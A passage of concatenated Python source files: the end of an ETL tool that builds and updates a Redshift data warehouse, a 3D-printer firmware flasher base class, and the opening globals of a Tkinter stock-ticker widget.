) -> None:
"""
Create schemas necessary for a full rebuild of data warehouse.
If `use_staging`, only create new staging schemas.
Otherwise, move standard position schemas out of the way by renaming them. Then create new ones.
"""
if use_staging:
etl.data_warehouse.create_schemas(schemas, use_staging=use_staging, dry_run=dry_run)
else:
etl.data_warehouse.backup_schemas(schemas, dry_run=dry_run)
etl.data_warehouse.create_schemas(schemas, dry_run=dry_run)
# --- Section 3: Functions that tie table operations together
def update_table(conn: connection, relation: LoadableRelation, dry_run=False) -> None:
"""
Update table contents either from CSV files from upstream sources or by running some SQL query.
This assumes that the table was previously created.
1. For tables backed by upstream sources, data is copied in.
2. If the CTAS doesn't have a key (no identity column), then values are inserted straight
from a view.
3. If a column is marked as being a key (identity is true), then a temporary table is built
from the query and then copied into the "CTAS" relation. If the name of the relation starts
with "dim_", then it's assumed to be a dimension and a row with missing values (mostly 0,
false, etc.) is added as well.
Finally, we run an ANALYZE statement to update table statistics (unless we're updating the
table within a transaction since -- we've been having problems with locks so skip the ANALYZE
for updates).
"""
try:
if relation.is_ctas_relation:
if relation.has_identity_column:
load_ctas_using_temp_table(conn, relation, dry_run=dry_run)
else:
load_ctas_directly(conn, relation, dry_run=dry_run)
else:
copy_data(conn, relation, dry_run=dry_run)
if not relation.in_transaction:
analyze(conn, relation, dry_run=dry_run)
except Exception as exc:
raise UpdateTableError(exc) from exc
def build_one_relation(conn: connection, relation: LoadableRelation, dry_run=False) -> None:
"""
Empty out tables (either with delete or by create-or-replacing them) and fill 'em up.
Unless in delete mode, this always makes sure tables and views are created.
Within transaction? Only applies to tables which get emptied and then potentially filled again.
Not in transaction? Drop and create all relations and for tables also potentially fill 'em up
again.
"""
with relation.monitor() as monitor:
# Step 1 -- clear out existing data (by deletion or by re-creation)
if relation.in_transaction:
if not relation.is_view_relation:
delete_whole_table(conn, relation, dry_run=dry_run)
else:
create_or_replace_relation(conn, relation, dry_run=dry_run)
# Step 2 -- load data (and verify)
if relation.is_view_relation:
pass
elif relation.skip_copy:
logger.info(f"Skipping loading data into {relation:x} (skip copy is active)")
elif relation.failed:
logger.info(f"Bypassing already failed relation {relation:x}")
else:
update_table(conn, relation, dry_run=dry_run)
verify_constraints(conn, relation, dry_run=dry_run)
# Step 3 -- log size of table
if relation.is_view_relation or relation.failed or relation.skip_copy:
return
stmt = f"SELECT COUNT(*) AS rowcount FROM {relation}"
if dry_run:
etl.db.skip_query(conn, stmt)
return
rows = etl.db.query(conn, stmt)
if rows:
rowcount = rows[0]["rowcount"]
logger.info(f"Found {rowcount:d} row(s) in {relation:x}")
monitor.add_extra("rowcount", rowcount)
def build_one_relation_using_pool(pool, relation: LoadableRelation, dry_run=False) -> None:
conn = pool.getconn()
conn.set_session(autocommit=True, readonly=dry_run)
try:
build_one_relation(conn, relation, dry_run=dry_run)
except Exception as exc:
# Add (some) exception information close to when it happened
message = str(exc).split("\n", 1)[0]
if relation.is_required:
logger.error(
"Exception information for required relation {:x}: {}".format(relation, message)
)
else:
logger.error("Exception information for relation {:x}: {}".format(relation, message))
pool.putconn(conn, close=True)
raise
else:
pool.putconn(conn, close=False)
def vacuum(relations: Sequence[RelationDescription], dry_run=False) -> None:
"""
Tidy up the warehouse before guests come over.
This needs to open a new connection since it needs to happen outside a transaction.
"""
dsn_etl = etl.config.get_dw_config().dsn_etl
timer = Timer()
with closing(etl.db.connection(dsn_etl, autocommit=True, readonly=dry_run)) as conn:
for relation in relations:
etl.db.run(
conn,
"Running vacuum on {:x}".format(relation),
"VACUUM {}".format(relation),
dry_run=dry_run,
)
if not dry_run:
logger.info("Ran vacuum for %d table(s) (%s)", len(relations), timer)
# --- Section 4: Functions related to control flow
def create_source_tables_when_ready(
relations: Sequence[LoadableRelation],
max_concurrency=1,
look_back_minutes=15,
dry_run=False,
) -> None:
"""
Create source relations in several threads, as we observe their extracts to be done.
We assume here that the relations have no dependencies on each other and just gun it.
This will only raise an Exception if one of the created relations was marked as "required".
Since these relations may have downstream dependents, we make sure to mark skip_copy on
any relation from the full set of relations that depends on a source relation that failed
to load.
"""
idle_termination_seconds = etl.config.get_config_int(
"arthur_settings.concurrent_load_idle_termination_seconds"
)
source_relations = [relation for relation in relations if not relation.is_transformation]
if not source_relations:
logger.info("None of the relations are in source schemas")
return
dsn_etl = etl.config.get_dw_config().dsn_etl
pool = etl.db.connection_pool(max_concurrency, dsn_etl)
recent_cutoff = datetime.utcnow() - timedelta(minutes=look_back_minutes)
cutoff_epoch = timegm(recent_cutoff.utctimetuple())
sleep_time = 30
checkpoint_time_cutoff = sleep_time + idle_termination_seconds
timer = Timer()
for dispatcher in etl.monitor.MonitorPayload.dispatchers:
if isinstance(dispatcher, etl.monitor.DynamoDBStorage):
table = dispatcher.get_table() # Note, not thread-safe, so we can only have one poller
def poll_worker():
"""
Check DynamoDB for successful extracts.
Get items from the queue 'to_poll'.
When the item
- is an identifier: poll DynamoDB
- is an int: sleep that many seconds
"""
while True:
try:
item = to_poll.get(block=False)
except queue.Empty:
logger.info("Poller: Nothing left to poll")
return
if isinstance(item, int):
logger.debug("Poller: Reached end of relation list")
logger.debug(
"Poller: Checking that we have fewer than %s tasks left by %s",
checkpoint_queue_size_cutoff,
checkpoint_time_cutoff,
)
logger.debug(
"Poller: %s left to poll, %s ready to load, %s elapsed",
to_poll.qsize(),
to_load.qsize(),
timer.elapsed,
)
if (
checkpoint_queue_size_cutoff == to_poll.qsize()
and timer.elapsed > checkpoint_time_cutoff
):
raise ETLRuntimeError(
"No new extracts found in last %s seconds, bailing out"
% idle_termination_seconds
)
else:
if to_poll.qsize():
logger.debug("Poller: Sleeping for %s seconds", item)
time.sleep(item)
to_poll.put(item)
continue
res = table.query(
ConsistentRead=True,
KeyConditionExpression="#ts > :dt and target = :table",
FilterExpression="step = :step and event in (:fail_event, :finish_event)",
ExpressionAttributeNames={"#ts": "timestamp"},
ExpressionAttributeValues={
":dt": cutoff_epoch,
":table": item.identifier,
":step": "extract",
":fail_event": etl.monitor.STEP_FAIL,
":finish_event": etl.monitor.STEP_FINISH,
},
)
if res["Count"] == 0:
to_poll.put(item)
else:
for extract_payload in res["Items"]:
if extract_payload["event"] == etl.monitor.STEP_FINISH:
logger.info(
"Poller: Recently completed extract found for '%s', marking as ready.",
item.identifier,
)
elif extract_payload["event"] == etl.monitor.STEP_FAIL:
logger.info(
"Poller: Recently failed extract found for '%s', marking as failed.",
item.identifier,
)
# We are not inside an exception handling so have no exception info.
item.mark_failure(relations, exc_info=None)
# We'll create the relation on success and failure (but skip copy on failure)
to_load.put(item)
# There should be only one event, but definitely don't queue for loading twice.
break
uncaught_load_worker_exception = threading.Event()
def load_worker():
"""
Look for a ready-to-load relation from queue 'to_load'.
If the item
- is a relation: load it using connection pool 'pool'
- is None: we're giving up, so return
"""
while True:
item = to_load.get()
if item is None:
break
logger.info("Loader: Found %s ready to be loaded", item.identifier)
try:
build_one_relation_using_pool(pool, item, dry_run=dry_run)
except (RelationConstructionError, RelationDataError):
item.mark_failure(relations)
except Exception:
logger.error(
"Loader: Uncaught exception in load worker while loading '%s':",
item.identifier,
exc_info=True,
)
uncaught_load_worker_exception.set()
raise
to_poll = queue.Queue() # type: ignore
to_load = queue.Queue() # type: ignore
threads = []
for _ in range(max_concurrency):
t = threading.Thread(target=load_worker)
t.start()
threads.append(t)
for relation in source_relations:
logger.debug("Putting %s into poller queue", relation.identifier)
to_poll.put(relation)
to_poll.put(sleep_time) # Give DynamoDB a periodic break
# Track the queue size to detect progress
checkpoint_queue_size_cutoff = to_poll.qsize() - 1 # -1 because worker will have one task 'in hand'
poller = threading.Thread(target=poll_worker)
poller.start()
threads.append(poller)
logger.info("Poller started; %s left to poll, %s ready to load", to_poll.qsize(), to_load.qsize())
while poller.is_alive():
# Give the poller time to realize it's passed the idle checkpoint if it was sleeping
poller.join(idle_termination_seconds + sleep_time)
logger.info("Poller joined or checkpoint timeout reached")
# Update checkpoint for timer to have made an update
checkpoint_time_cutoff = timer.elapsed + idle_termination_seconds
logger.info(
"Current elapsed time: %s; cancel if no progress by %s", timer, checkpoint_time_cutoff
)
# Update last known queue size
checkpoint_queue_size_cutoff = to_poll.qsize()
logger.info("Current queue length: %s", checkpoint_queue_size_cutoff)
# When poller is done, send workers a 'stop' event and wait
for _ in range(max_concurrency):
to_load.put(None)
for t in threads:
t.join()
# If the poller queue wasn't emptied, it exited unhappily
if to_poll.qsize():
raise ETLRuntimeError("Extract poller exited while to-poll queue was not empty")
if uncaught_load_worker_exception.is_set():
raise ETLRuntimeError("Data source loader thread(s) exited with uncaught exception")
logger.info("Wrapping up work in %d worker(s): (%s)", max_concurrency, timer)
failed_and_required = [rel.identifier for rel in source_relations if rel.failed and rel.is_required]
if failed_and_required:
raise RequiredRelationLoadError(failed_and_required)
failed = [relation.identifier for relation in source_relations if relation.failed]
if failed:
logger.error(
"These %d relation(s) failed to build: %s", len(failed), join_with_single_quotes(failed)
)
logger.info("Finished with %d relation(s) in source schemas (%s)", len(source_relations), timer)
# --- Section 4: Functions related to control flow
def create_source_tables_in_parallel(
relations: Sequence[LoadableRelation], max_concurrency=1, dry_run=False
) -> None:
"""
Create relations in parallel, using a connection pool, a thread pool, and a kiddie pool.
We assume here that the relations have no dependencies on each other and just gun it.
This will only raise an Exception if one of the created relations was marked as "required".
Since these relations may have downstream dependents, we make sure to mark skip_copy on
any relation from the full set of relations that depends on a source relation that failed
to load.
"""
source_relations = [relation for relation in relations if not relation.is_transformation]
if not source_relations:
logger.info("None of the relations are in source schemas")
return
timer = Timer()
dsn_etl = etl.config.get_dw_config().dsn_etl
pool = etl.db.connection_pool(max_concurrency, dsn_etl)
futures: Dict[str, concurrent.futures.Future] = {}
try:
with concurrent.futures.ThreadPoolExecutor(max_workers=max_concurrency) as executor:
for relation in source_relations:
future = executor.submit(build_one_relation_using_pool, pool, relation, dry_run=dry_run)
futures[relation.identifier] = future
# For fail-fast, switch to FIRST_EXCEPTION below.
done, not_done = concurrent.futures.wait(
futures.values(), return_when=concurrent.futures.ALL_COMPLETED
)
cancelled = [future for future in not_done if future.cancel()]
logger.info(
"Wrapping up work in %d worker(s): %d done, %d not done (%d cancelled) (%s)",
max_concurrency,
len(done),
len(not_done),
len(cancelled),
timer,
)
finally:
pool.closeall()
for relation in source_relations:
try:
futures[relation.identifier].result()
except concurrent.futures.CancelledError:
pass
except (RelationConstructionError, RelationDataError):
relation.mark_failure(relations)
failed_and_required = [rel.identifier for rel in source_relations if rel.failed and rel.is_required]
if failed_and_required:
raise RequiredRelationLoadError(failed_and_required)
failed = [relation.identifier for relation in source_relations if relation.failed]
if failed:
logger.error(
"These %d relation(s) failed to build: %s", len(failed), join_with_single_quotes(failed)
)
logger.info("Finished with %d relation(s) in source schemas (%s)", len(source_relations), timer)
def create_transformations_sequentially(
relations: Sequence[LoadableRelation], wlm_query_slots: int, statement_timeout: int, dry_run=False
) -> None:
"""
Create relations one-by-one.
If relations do depend on each other, we don't get ourselves in trouble here.
If we trip over a "required" relation, an exception is raised.
If dependencies were left empty, we'll fall back to skip_copy mode.
Given a dependency tree of:
A(required) <- B(required, per selector) <- C(not required) <- D (not required)
Then failing to create either A or B will stop us. But failure on C will just leave D empty.
N.B. It is not possible for a relation to be not required but have dependents that are
(by construction).
"""
transformations = [relation for relation in relations if relation.is_transformation]
if not transformations:
logger.info("None of the selected relations are in transformation schemas")
return
timer = Timer()
dsn_etl = etl.config.get_dw_config().dsn_etl
with closing(etl.db.connection(dsn_etl, autocommit=True, readonly=dry_run)) as conn:
etl.dialect.redshift.set_wlm_slots(conn, wlm_query_slots, dry_run=dry_run)
etl.dialect.redshift.set_statement_timeout(conn, statement_timeout, dry_run=dry_run)
for relation in transformations:
try:
build_one_relation(conn, relation, dry_run=dry_run)
except (RelationConstructionError, RelationDataError) as exc:
if relation.is_required:
raise RequiredRelationLoadError([relation.identifier]) from exc
relation.mark_failure(relations)
failed = [relation.identifier for relation in transformations if relation.failed]
if failed:
logger.error(
"These %d relation(s) failed to build: %s", len(failed), join_with_single_quotes(failed)
)
skipped = [
relation.identifier
for relation in transformations
if relation.skip_copy and not relation.is_view_relation
]
if 0 < len(skipped) < len(transformations):
logger.warning(
"These %d relation(s) were left empty: %s", len(skipped), join_with_single_quotes(skipped)
)
logger.info(
"Finished with %d relation(s) in transformation schemas (%s)", len(transformations), timer
)
def create_relations(
relations: Sequence[LoadableRelation],
max_concurrency=1,
wlm_query_slots=1,
statement_timeout=0,
concurrent_extract=False,
dry_run=False,
) -> None:
"""Build relations by creating them, granting access, and loading them (if they hold data)."""
if concurrent_extract:
create_source_tables_when_ready(relations, max_concurrency, dry_run=dry_run)
else:
create_source_tables_in_parallel(relations, max_concurrency, dry_run=dry_run)
create_transformations_sequentially(relations, wlm_query_slots, statement_timeout, dry_run=dry_run)
# --- Section 5: "Callbacks" (functions that implement commands)
# --- Section 5A: commands that modify tables and views
def load_data_warehouse(
all_relations: Sequence[RelationDescription],
selector: TableSelector,
use_staging=True,
publish_staging=True,
max_concurrency=1,
wlm_query_slots=1,
statement_timeout=0,
concurrent_extract=False,
skip_copy=False,
skip_loading_sources=False,
dry_run=False,
):
"""
Fully "load" the data warehouse after creating a blank slate.
By default, we use staging positions of schemas to load and thus wait with
moving existing schemas out of the way until the load is complete.
This function allows only complete schemas as selection.
1 Determine schemas that house any of the selected or dependent relations.
2 Move old schemas in the data warehouse out of the way (for "backup").
3 Create new schemas (and give access)
4 Loop over all relations in selected schemas:
4.1 Create relation (and give access)
4.2 Load data into tables or CTAS (no further action for views)
If it's a source table, use COPY to load data.
If it's a CTAS with an identity column, create temp table, then move data into final table.
If it's a CTAS without an identity column, insert values straight into final table.
On error: exit if use_staging, otherwise restore schemas from backup position
N.B. If arthur gets interrupted (eg. because the instance is inadvertently shut down),
then there will be an incomplete state.
This is a callback of a command.
"""
selected_relations = etl.relation.select_in_execution_order(
all_relations, selector, include_dependents=True
)
if not selected_relations:
return
relations = LoadableRelation.from_descriptions(
selected_relations,
"load",
skip_copy=skip_copy,
skip_loading_sources=skip_loading_sources,
use_staging=use_staging,
)
traversed_schemas = find_traversed_schemas(relations)
logger.info(
"Starting to load %d relation(s) in %d schema(s)", len(relations), len(traversed_schemas)
)
dsn_etl = etl.config.get_dw_config().dsn_etl
with closing(etl.db.connection(dsn_etl, autocommit=True)) as conn:
tx_info = etl.data_warehouse.list_open_transactions(conn)
etl.db.print_result("List of sessions that have open transactions:", tx_info)
etl.data_warehouse.create_groups(dry_run=dry_run)
create_schemas_for_rebuild(traversed_schemas, use_staging=use_staging, dry_run=dry_run)
try:
create_relations(
relations,
max_concurrency,
wlm_query_slots,
statement_timeout,
concurrent_extract=concurrent_extract,
dry_run=dry_run,
)
except ETLRuntimeError:
if not use_staging:
logger.info("Restoring %d schema(s) after load failure", len(traversed_schemas))
etl.data_warehouse.restore_schemas(traversed_schemas, dry_run=dry_run)
raise
if use_staging and publish_staging:
logger.info("Publishing %d schema(s) after load success", len(traversed_schemas))
etl.data_warehouse.publish_schemas(traversed_schemas, dry_run=dry_run)
elif use_staging:
logger.info(
f"Updated {len(traversed_schemas)} staging schema(s) without updating loaded schemas"
)
def upgrade_data_warehouse(
all_relations: Sequence[RelationDescription],
selector: TableSelector,
max_concurrency=1,
wlm_query_slots=1,
statement_timeout=0,
only_selected=False,
include_immediate_views=False,
continue_from: Optional[str] = None,
use_staging=False,
target_schema: Optional[str] = None,
skip_copy=False,
dry_run=False,
) -> None:
"""
Push new (structural) changes and fresh data through data warehouse.
This will create schemas as needed to house the relations being created or replaced.
The set of relations is usually expanded to include all those in (transitively) depending
on the selected ones. But this can be kept to just the selected ones for faster testing.
For all relations:
1 Drop relation
2.Create relation and grant access to the relation
3 Unless skip_copy is true (else leave tables empty):
3.1 Load data into tables
3.2 Verify constraints
Since views that directly hang off tables are deleted when their tables are deleted, the option
exists to include those immediate views in the upgrade.
If a target schema is provided, then the data is loaded into that schema instead of where the
relation would normally land. Note that a check prevents loading tables from different
execution levels in order to avoid loading tables that depend on each other. (In that case,
the query would have to be rewritten to use the relocated table.)
This is a callback of a command.
"""
selected_relations = etl.relation.select_in_execution_order(
all_relations,
selector,
include_dependents=not only_selected,
include_immediate_views=include_immediate_views,
continue_from=continue_from,
)
if not selected_relations:
return
involved_execution_levels = frozenset(
funcy.distinct(relation.execution_level for relation in selected_relations)
)
if target_schema and len(involved_execution_levels) != 1:
raise ETLRuntimeError(
f"relations might depend on each other while target schema is in effect "
f"(involved execution levels: {join_with_single_quotes(involved_execution_levels)})"
)
if only_selected and not include_immediate_views:
immediate_views = [
view.identifier for view in etl.relation.find_immediate_dependencies(all_relations, selector)
]
if immediate_views:
logger.warning(
"These views are not part of the upgrade: %s", join_with_single_quotes(immediate_views)
)
logger.info(
"Any views that depend in their query on tables that are part of the upgrade but"
" are not selected will be missing once the upgrade completes."
)
relations = LoadableRelation.from_descriptions(
selected_relations,
"upgrade",
skip_copy=skip_copy,
use_staging=use_staging,
target_schema=target_schema,
)
if target_schema:
logger.info("Starting to load %d relation(s) into schema '%s'", len(relations), target_schema)
else:
traversed_schemas = find_traversed_schemas(relations)
logger.info(
"Starting to upgrade %d relation(s) in %d schema(s)", len(relations), len(traversed_schemas)
)
etl.data_warehouse.create_schemas(traversed_schemas, use_staging=use_staging, dry_run=dry_run)
create_relations(relations, max_concurrency, wlm_query_slots, statement_timeout, dry_run=dry_run)
def update_data_warehouse(
all_relations: Sequence[RelationDescription],
selector: TableSelector,
wlm_query_slots=1,
statement_timeout=0,
start_time: Optional[datetime] = None,
only_selected=False,
run_vacuum=False,
dry_run=False,
):
"""
Let new data percolate through the data warehouse.
Within a transaction:
Iterate over relations (selected or (selected and transitively dependent)):
1 Delete rows
2.Load data from upstream sources using COPY command, load data into CTAS using views
for queries
3 Verify constraints
Note that a failure will rollback the transaction -- there is no distinction between required
or not-required.
Finally, if elected, run vacuum (in new connection) for all tables that were modified.
This is a callback of a command.
"""
selected_relations = etl.relation.select_in_execution_order(
all_relations, selector, include_dependents=not only_selected
)
tables = [relation for relation in selected_relations if not relation.is_view_relation]
if not tables:
logger.warning("Found no tables matching: %s", selector)
return
source_relations = [relation for relation in selected_relations if not relation.is_transformation]
if source_relations and start_time is not None:
logger.info(
"Verifying that all source relations have extracts after %s;"
" fails if incomplete and no update for 1 hour" % start_time
)
extracted_targets = etl.monitor.recently_extracted_targets(source_relations, start_time)
if len(source_relations) > len(extracted_targets):
raise MissingExtractEventError(source_relations, extracted_targets)
elif source_relations:
logger.info(
"Attempting to use existing manifests for source relations without verifying recency."
)
relations = LoadableRelation.from_descriptions(selected_relations, "update", in_transaction=True)
logger.info("Starting to update %d tables(s) within a transaction", len(relations))
dsn_etl = etl.config.get_dw_config().dsn_etl
with closing(etl.db.connection(dsn_etl, readonly=dry_run)) as tx_conn, tx_conn as conn:
etl.dialect.redshift.set_wlm_slots(conn, wlm_query_slots, dry_run=dry_run)
etl.dialect.redshift.set_statement_timeout(conn, statement_timeout, dry_run=dry_run)
for relation in relations:
build_one_relation(conn, relation, dry_run=dry_run)
if run_vacuum:
vacuum(tables, dry_run=dry_run)
# --- Section 5B: commands that provide information about relations
def run_query(relation: RelationDescription, limit=None, use_staging=False) -> None:
"""
Run the query for the relation (which must be a transformation, not a source).
This is a callback of a command.
"""
dsn_etl = etl.config.get_dw_config().dsn_etl
loadable_relation = LoadableRelation(relation, {}, use_staging)
timer = Timer()
# We cannot use psycopg2's '%s' with LIMIT since the query may contain
# arbitrary text, including "LIKE '%something%', which would break mogrify.
limit_clause = "LIMIT NULL" if limit is None else f"LIMIT {limit:d}"
query_stmt = loadable_relation.query_stmt + f"\n{limit_clause}\n"
with closing(etl.db.connection(dsn_etl)) as conn:
logger.info(
"Running query underlying '%s' (with '%s')",
relation.identifier,
limit_clause,
)
results = etl.db.query(conn, query_stmt)
logger.info(
"Ran query underlying '%s' and received %d row(s) (%s)", relation.identifier, len(results), timer
)
# TODO(tom): This should grab the column names from the query to help with debugging.
if relation.has_identity_column:
columns = relation.unquoted_columns[1:]
else:
columns = relation.unquoted_columns
print(format_lines(results, header_row=columns))
def check_constraints(relations: Sequence[RelationDescription], use_staging=False) -> None:
"""
Check the table constraints of selected relations.
This is a callback of a command.
"""
dsn_etl = etl.config.get_dw_config().dsn_etl
loadable_relations = [LoadableRelation(relation, {}, use_staging) for relation in relations]
timer = Timer()
with closing(etl.db.connection(dsn_etl)) as conn:
for relation in loadable_relations:
logger.info("Checking table constraints of '%s'", relation.identifier)
verify_constraints(conn, relation)
logger.info("Checked table constraints of %d relation(s) (%s)", len(loadable_relations), timer)
def show_downstream_dependents(
relations: Sequence[RelationDescription],
selector: TableSelector,
continue_from: Optional[str] = None,
with_dependencies: Optional[bool] = False,
with_dependents: Optional[bool] = False,
) -> None:
"""
List the execution order of loads or updates.
Relations are marked based on whether they were directly selected or selected as
part of the propagation of new data.
They are also marked whether they'd lead to a fatal error since they're required for full load.
This is a callback of a command.
"""
# Relations are directly selected by pattern or by being somewhere downstream of a selected one.
selected_relations = etl.relation.select_in_execution_order(
relations, selector, include_dependents=True, continue_from=continue_from
)
if not selected_relations:
return
directly_selected_relations = etl.relation.find_matches(selected_relations, selector)
selected = frozenset(relation.identifier for relation in directly_selected_relations)
immediate_views = etl.relation.find_immediate_dependencies(selected_relations, selector)
immediate = frozenset(relation.identifier for relation in immediate_views)
logger.info(
"Execution order includes %d selected, %d immediate, and %d other downstream relation(s)",
len(selected),
len(immediate),
len(selected_relations) - len(selected) - len(immediate),
)
flag = {}
for relation in selected_relations:
if relation.identifier in selected:
flag[relation.identifier] = "selected"
elif relation.identifier in immediate:
flag[relation.identifier] = "immediate"
else:
flag[relation.identifier] = "dependent"
dependents = defaultdict(list)
for relation in relations:
for dependency in relation.dependencies:
dependents[dependency.identifier].append(relation.identifier)
# See computation of execution order -- anything depending on pg_catalog must come last.
pg_catalog_dependency = {
dependency.identifier
for relation in selected_relations
for dependency in relation.dependencies
if dependency.schema == "pg_catalog"
}
current_index = {relation.identifier: i + 1 for i, relation in enumerate(selected_relations)}
# Note that external tables are not in the list of relations (always level = 0),
# and if a relation isn't part of downstream, they're considered built already (level = 0).
current_level: Dict[str, int] = defaultdict(int)
# Now set the level that we show so that it starts at 1 for the relations we're building here.
# Pass 1: find out the largest level, ignoring pg_catalog dependencies.
for relation in selected_relations:
current_level[relation.identifier] = 1 + max(
(current_level[dependency.identifier] for dependency in relation.dependencies), default=0
)
# Pass 2: update levels assuming pg_catalog is built at that largest level so far.
pg_catalog_level = max(current_level.values())
for identifier in pg_catalog_dependency:
current_level[identifier] = pg_catalog_level
for relation in selected_relations:
current_level[relation.identifier] = 1 + max(
(current_level[dependency.identifier] for dependency in relation.dependencies), default=0
)
width_selected = max(len(identifier) for identifier in current_index)
width_dep = max(len(identifier) for identifier in current_level)
line_template = (
"{relation.identifier:{width}s}"
" # {relation.source_type} index={index:4d} level={level:3d}"
" flag={flag:9s}"
" is_required={relation.is_required}"
)
dependency_template = " #<- {identifier:{width}s} level={level:3d}"
dependent_template = " #-> {identifier:{width}s} index={index:4d} level={level:3d}"
for relation in selected_relations:
print(
line_template.format(
flag=flag[relation.identifier],
index=current_index[relation.identifier],
level=current_level[relation.identifier],
relation=relation,
width=width_selected,
)
)
if with_dependencies:
for dependency in sorted(relation.dependencies):
print(
dependency_template.format(
identifier=dependency.identifier,
level=current_level[dependency.identifier],
width=width_dep,
)
)
if with_dependents:
for dependent in sorted(dependents[relation.identifier], key=lambda x: current_index[x]):
print(
dependent_template.format(
identifier=dependent,
index=current_index[dependent],
level=current_level[dependent],
width=width_dep,
)
)
def show_upstream_dependencies(relations: Sequence[RelationDescription], selector: TableSelector):
"""
List the relations upstream (towards sources) from the selected ones in execution order.
This is a callback of a command.
"""
execution_order = etl.relation.order_by_dependencies(relations)
selected_relations = etl.relation.find_matches(execution_order, selector)
if len(selected_relations) == 0:
logger.warning("Found no matching relations for: %s", selector)
return
dependencies = {relation.identifier for relation in selected_relations}
for relation in execution_order[::-1]:
if relation.identifier in dependencies:
dependencies.update(dep.identifier for dep in relation.dependencies)
max_len = max(len(identifier) for identifier in dependencies)
line_template = (
"{relation.identifier:{width}s} # {relation.source_type} index={index:4d}"
" is_required={relation.is_required}"
)
for i, relation in enumerate(execution_order):
if relation.identifier in dependencies:
print(line_template.format(index=i + 1, relation=relation, width=max_len))
|
base_flasher.py
|
from .flasher_error import FlasherError
import time
import flask
import requests
import tempfile
import os
import re
from threading import Thread
class BaseFlasher:
def __init__(self, settings, printer, plugin, plugin_manager, identifier, logger):
self._settings = settings
self._printer = printer
self._plugin = plugin
self._plugin_manager = plugin_manager
self._identifier = identifier
self._logger = logger
self._firmware = None
self._firmware_version = None
self._firmware_author = None
self._firmware_upload_time = None
self._should_run_post_script = False
self._flash_status = None
def _background_run(self, target, args=None):
thread = Thread(target=target, args=args)
thread.start()
return thread
def _run_pre_flash_script(self):
pre_flash_script = self._settings.get_pre_flash_script()
if pre_flash_script:
self._logger.debug("Running pre-flash GCode script :")
self._logger.debug(pre_flash_script)
commands = [line.strip() for line in pre_flash_script.splitlines()]
self._printer.commands(commands)
else:
self._logger.debug("No pre-flash GCode script defined")
def _wait_pre_flash_delay(self):
self._logger.debug("Waiting pre-flash delay...")
time.sleep(self._settings.get_pre_flash_delay())
def _run_post_flash_script(self):
post_flash_script = self._settings.get_post_flash_script()
if post_flash_script:
self._logger.debug("Running post-flash script")
self._logger.debug(post_flash_script)
commands = [line.strip() for line in post_flash_script.splitlines()]
self._printer.commands(commands)
else:
self._logger.debug("No script defined")
def _wait_post_flash_delay(self):
self._logger.debug("Waiting post-flash delay...")
time.sleep(self._settings.get_post_flash_delay())
def _validate_firmware_file(self, file_path):
raise FlasherError("Unsupported function call.")
def handle_connected_event(self):
if self._should_run_post_script:
self._run_post_flash_script()
self._should_run_post_script = False
def check_setup_errors(self):
raise FlasherError("Unsupported function call.")
def upload(self):
self._logger.debug("Firmware uploaded by the user")
uploaded_file_path = flask.request.values["firmware_file." + self._settings.get_upload_path_suffix()]
errors = self._validate_firmware_file(uploaded_file_path)
if errors:
self._push_firmware_info()
return None, errors
result = self._handle_firmware_file(uploaded_file_path)
self._push_firmware_info()
return result
def download(self):
self._logger.debug("Downloading firmware...")
r = requests.get(flask.request.values["url"])
self._logger.debug("Saving downloaded firmware...")
with tempfile.NamedTemporaryFile(delete=False) as temp:
temp.write(r.content)
temp_path = temp.name
errors = self._validate_firmware_file(temp_path)
if errors:
self._push_firmware_info()
os.remove(temp_path)
return None, errors
result = self._handle_firmware_file(temp_path)
self._push_firmware_info()
self._logger.debug("Clearing downloaded firmware...")
os.remove(temp_path)
return result
def _handle_firmware_file(self, firmware_file_path):
raise FlasherError("Unsupported function call.")
def _find_firmware_info(self):
for root, dirs, files in os.walk(self._firmware):
for f in files:
if f == "Version.h":
self._logger.debug("Found Version.h, opening it...")
with open(os.path.join(root, f), "r") as version_file:
for line in version_file:
version = re.findall(r'#define +SHORT_BUILD_VERSION +"([^"]*)"', line)
if version:
self._firmware_version = version[0]
self._logger.debug("Found SHORT_BUILD_VERSION : %s" % self._firmware_version)
break
elif f == "Configuration.h":
self._logger.debug("Found Configuration.h, opening it...")
with open(os.path.join(root, f), "r") as configfile:
for line in configfile:
author = re.findall(r'#define +STRING_CONFIG_H_AUTHOR +"([^"]*)"', line)
if author:
self._firmware_author = author[0]
self._logger.debug("Found STRING_CONFIG_H_AUTHOR : %s" % self._firmware_author)
break
def _firmware_info_event_name(self):
raise FlasherError("Undefined function call")
def _push_firmware_info(self):
self._logger.debug("Sending firmware info through websocket")
self._plugin_manager.send_plugin_message(self._identifier, dict(
type=self._firmware_info_event_name(),
version=self._firmware_version,
author=self._firmware_author,
upload_time=self._firmware_upload_time.strftime("%d/%m/%Y, %H:%M:%S") if self._firmware_upload_time is not None else None,
firmware=self._firmware
))
def _push_flash_status(self, event_name):
if self._flash_status:
data = dict(
type=event_name
)
data.update(self._flash_status)
self._plugin_manager.send_plugin_message(self._identifier, data)
def send_initial_state(self):
self._push_firmware_info()
|
stockwatcher.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
########################################################################
# Name:
# stockwatcher.py
# Description:
# GUI tools, display stocks in a floating windows.
# Author:
# wesley wu
# Python:
# 3.5+
# Version:
# 1.0
########################################################################
# by Dxw 20200805
# Forked from: https://github.com/weswu8/stockwatcher
# v1.1
# 1. Reconnect after network disconnect
# 2. Remove the bin from the git repo
# 3. Remove & sw-small.ico
# 4. Automatically hide the interface during non-trading period
########################################################################
from tkinter import *
from tkinter.font import Font
from PIL import Image, ImageTk
from urllib.request import urlopen
import json, time, threading, datetime, base64, io
# ==================define the global variables ========================
# the url of remote stock service
mRemoteStockUrl = 'http://hq.sinajs.cn/list='
mRemoteStockImgUrl = 'http://image.sinajs.cn/newchart/min/n/{}.gif'
# the configuration file for the tools
mConfFile = 'stockwatcher.conf'
# the key name of in the configuration file
mConfSection = 'stocks'
# the click event flag
mOnMouseEnter = False
# the width of the windows
mWinWidth = 400
mMainWinHeight = 25
mMainWinBottomLeftShift = 10
mMainWinBottomUpShift = 40
mPopWinWidth = 545
mPopWinLeftShift = 150
mPopWinUpShift = 340
mPopWinHeight = 300
# define the tat
mUpTag = 'UP'
mEvenTag = 'EVEN'
mDownTag = 'DOWN'
# define the char
mCharUp = '\u25B2'
mCharDown = '\u25BC'
mCharEven = '\u268C'
mCharWin = '\u2600'
mCharLose = '\u2614'
mCharDraw = '\u268C'
mCharWinAlert = '\u2615'
mCharLoseAlert = '\u2702'
# ms time for the speed of text scroll
mCharRefreshSpeed = 5000
# the multiplier with the size of the msg
mRefreshMultiplier = 1
# the stock info refresh interval by seconds
